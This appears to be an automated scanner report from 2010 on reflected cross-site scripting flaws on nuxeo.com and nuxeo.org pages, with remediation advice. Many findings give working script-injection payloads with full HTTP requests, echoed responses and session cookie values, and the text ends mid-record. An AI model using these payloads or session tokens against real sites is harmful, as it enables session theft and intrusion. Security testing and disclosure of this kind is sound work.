Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into an HTML comment. The payload f0bfc--><script>alert(1)</script>c7ef7c6008c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 2 is copied into an HTML comment. The payload 49edf--><script>alert(1)</script>68af400bc97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 2d2b4--><script>alert(1)</script>159f19a261e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010 HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:24 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:18:24 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010/--> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a5297--><script>alert(1)</script>3cc6fdb1f92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010 HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:19:06 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:19:06 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010/--> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload f5c36--><script>alert(1)</script>d4ffa27e9fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010 HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:19:47 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:19:47 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010/--> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 76a8c--><script>alert(1)</script>892930f1e68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68 HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:20:25 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:20:25 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68/--> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 47d33--><script>alert(1)</script>1c4a2e654c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:56 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:17:56 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33711
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form/--> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 15bd8--><script>alert(1)</script>86fa8735a8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:41 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 15 Nov 2010 12:18:41 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:18:41 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/downloads15bd8--><script>alert(1)</script>86fa8735a8f/download-dm-form/--> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload df27c--><script>alert(1)</script>40a84b08494 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494 HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:19:08 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 15 Nov 2010 12:19:08 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:19:08 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/downloads/download-dm-formdf27c--><script>alert(1)</script>40a84b08494/--> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6945d--><script>alert(1)</script>9547c34988d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:51 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:17:51 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33747
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en6945d--><script>alert(1)</script>9547c34988d/products/document-management/getting-started/--> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8692f--><script>alert(1)</script>841c8c775c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:43 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:18:43 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/products8692f--><script>alert(1)</script>841c8c775c8/document-management/getting-started/--> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 4d655--><script>alert(1)</script>e6f61f7d157 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:19:20 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:19:20 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/products/document-management4d655--><script>alert(1)</script>e6f61f7d157/getting-started/--> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 74450--><script>alert(1)</script>6984a629a28 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28 HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:19:48 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:19:49 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/products/document-management/getting-started74450--><script>alert(1)</script>6984a629a28/--> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71135--><script>alert(1)</script>410caedb9c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en71135--><script>alert(1)</script>410caedb9c4/services/training HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:01 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:18:02 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33693
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en71135--><script>alert(1)</script>410caedb9c4/services/training/--> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 7dac6--><script>alert(1)</script>417df72f5c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/services7dac6--><script>alert(1)</script>417df72f5c7/training HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:54 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:18:54 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/services7dac6--><script>alert(1)</script>417df72f5c7/training/--> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 38728--><script>alert(1)</script>3534a3f71fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /en/services/training38728--><script>alert(1)</script>3534a3f71fa HTTP/1.1 Host: www.nuxeo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:19:39 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:19:39 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33659
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/en/services/training38728--><script>alert(1)</script>3534a3f71fa/--> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7e1f1--><script>alert(1)</script>7e40053b44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 3 is copied into an HTML comment. The payload 10d63--><script>alert(1)</script>ad21aa13a8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 5 is copied into an HTML comment. The payload 3bff6--><script>alert(1)</script>be29ccef587 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:09:54 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: eZ Publish Set-Cookie: eZSESSID=213640b5ccd9e02f69c3dca67dfd6a01; path=/ Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Mon, 15 Nov 2010 14:09:54 GMT Served-by: www.nuxeo.com Content-language: en-US Status: 404 Not Found Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 33739
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <hea ...[SNIP]... <!--/extension/nuxeo_design/design/nuxeo/javascript3bff6--><script>alert(1)</script>be29ccef587/mtcJSAPI.js/--> ...[SNIP]...
1.20. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nuxeo.org
Path:
/discussions/index.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ade"><script>alert(1)</script>c594b43b6bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /discussions/index.jspa?d3ade"><script>alert(1)</script>c594b43b6bf=1 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f83de"><img%20src%3da%20onerror%3dalert(1)>5f41d66ee78 was submitted in the REST URL parameter 4. This input was echoed as f83de"><img src=a onerror=alert(1)>5f41d66ee78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
